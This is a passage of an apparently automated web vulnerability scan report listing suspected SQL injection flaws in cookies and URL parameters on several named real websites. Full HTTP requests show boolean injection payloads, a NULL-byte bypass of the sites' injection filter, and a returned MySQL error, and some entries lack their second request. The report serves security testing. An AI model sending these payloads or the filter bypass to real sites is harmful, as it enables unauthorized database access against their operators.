<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

Request 2

GET /user/KDthunderup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05615946719'%20or%201%3d2--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:54:14 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0022521018981934
X-Served-In: 1.078409910202
X-Served-By: ded2062
Content-Length: 27941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
KDt
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=8696083892">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=49801665906" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

1.47. http://tweetmeme.com/user/RWW [__csnv cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/user/RWW

Issue detail

The __csnv cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __csnv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user/RWW HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0'%20and%201%3d1--%20; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:54:58 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0021669864654541
X-Served-In: 1.6059739589691
X-Served-By: ded2061
Content-Length: 38843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
RWW
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=91982936287">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=55618636940" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

Request 2

GET /user/RWW HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0'%20and%201%3d2--%20; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:55:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026979446411133
X-Served-In: 1.5601210594177
X-Served-By: ded2060
Content-Length: 38833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
RWW
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=143229935">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=54531145923" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

1.48. http://tweetmeme.com/user/reiserlaw [__qca cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/user/reiserlaw

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __qca cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user/reiserlaw HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201'%20and%201%3d1--%20; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044441223144531
X-Served-In: 1.7354860305786
X-Served-By: h04
Content-Length: 39553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
rei
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=9850663010">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=29191093109" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

Request 2

GET /user/reiserlaw HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201'%20and%201%3d2--%20; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:55 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0019690990447998
X-Served-In: 1.5970060825348
X-Served-By: ded2059
Content-Length: 39563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
rei
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=93230269637">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=45976943271" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

1.49. http://www.abbreviations.com/getsugg.aspx [ltrs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/getsugg.aspx

Issue detail

The ltrs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltrs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /getsugg.aspx?ltrs=%00' HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:41 GMT
Connection: close
Content-Length: 222

<suggestions>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' GROUP BY ACRONYM ORDER BY ACRONYM ASC LIMIT 15' at line 1</suggestions>

Request 2

GET /getsugg.aspx?ltrs=%00'' HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response 2

1.50. http://www.beirut.com/Restaurants/Dining/314749128 [base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.beirut.com
Path:	/Restaurants/Dining/314749128

Issue detail

The base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /Restaurants/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com%00';

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:21:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<h5>Chez Sophie, an exceptional restaurant that mixes contemporary French and Italian cuisine, along with a touch of Mediterranean inspiration.</h5>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:21:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.51. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

Request 1

GET /Shopping/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com';

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:45:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<h5>Since its inception, Calvin Klein Underwear for Men and Women has led the market by offering consumers cutting-edge design, innovative fabrics, and exceptional fit and quality.</h5>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:46:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.52. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18394333'%20or%201%3d1--%20 and 18394333'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Shopping/Clothing-Accessories/19436778418394333'%20or%201%3d1--%20/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:18:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<iframe id='a8c465c4' name='a8c465c4' src='http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=891208577' frameborder='0' scrolling='no' width='728' height='90' allowtransparency='true'></iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
</div>
<div class="cl"> </div>
<div id="header">
<div id="navigation">
<ul>
<li><a class="resetmenu" href="#">things to do</a>
<div class="dropdown">
<div class="main-menu">
<ul class="col-3">
<li><a href="/ThingsToDo/Today">Today</a></li>
<li><a href="/ThingsToDo/ThisWeek">This Week</a></li>
<li><a href="#sub-menu-1thingstodo">All Things to Do</a></li>
<li><a href="#sub-menu-1movies">Movies</a></li>
<li><a href="#sub-menu-1justforkids">Just For Kids</a></li>
<li><a href="#sub-menu-1recreations">Fun & Recreation</a></li>
<li><a href="/chat">Chat Online</a></li>
<li><a href="/twitter">Explore Twitter</a></li>
<li><a href="/Online-Internet/Blogs">Visit Lebanese Blogs</a></li>
</ul>
</div>
<div id="sub-menu-1thingstodo" class="sub-menu">
<p class="main-btn" id="/ThingsToDo">All Things to Do <a href="#" class="return"></a></p>
<ul class="col-3">
<li><a href="/ThingsToDo/Exhibitions/6382333962">Exhibitions</a></li>
<li><a href="/ThingsToDo/Festivals/272910464">Festivals</a></li>
<li><a href="/ThingsToDo/Gatherings/9274143605">Gatherings</a></li>
<li><a href="/ThingsToDo/Live-Music/560568055">Live Music</a></li>
<li><a href="/ThingsToDo/Markets-and-Deals/0106299254">Markets & Deals</a></li>
<li><a href="/ThingsToDo/Parties/1690334">Parties</a></li>
<li><a href="/ThingsToDo/Performances/112730726">Performances</a></li>
<li><a href="/ThingsToDo/Screenings/60463877">Screenings</a></li>
<li><a href="/ThingsToDo/Seminars-and-Lectures/295390016">Seminars & Lectures</a></li>
<li><a href="/ThingsToDo/Theater/706796009">Theater</a></li>
<li><a href="/ThingsToDo/Workshops/7278901598">Workshops</a></li>
</ul></div><div id="sub-menu-1movies" class="sub-menu">
<p class="main-btn" id="/Movies">Movies <a href="#" class="return"></a></p>
<ul class="
...[SNIP]...

Request 2

GET /Shopping/Clothing-Accessories/19436778418394333'%20or%201%3d2--%20/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:18:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
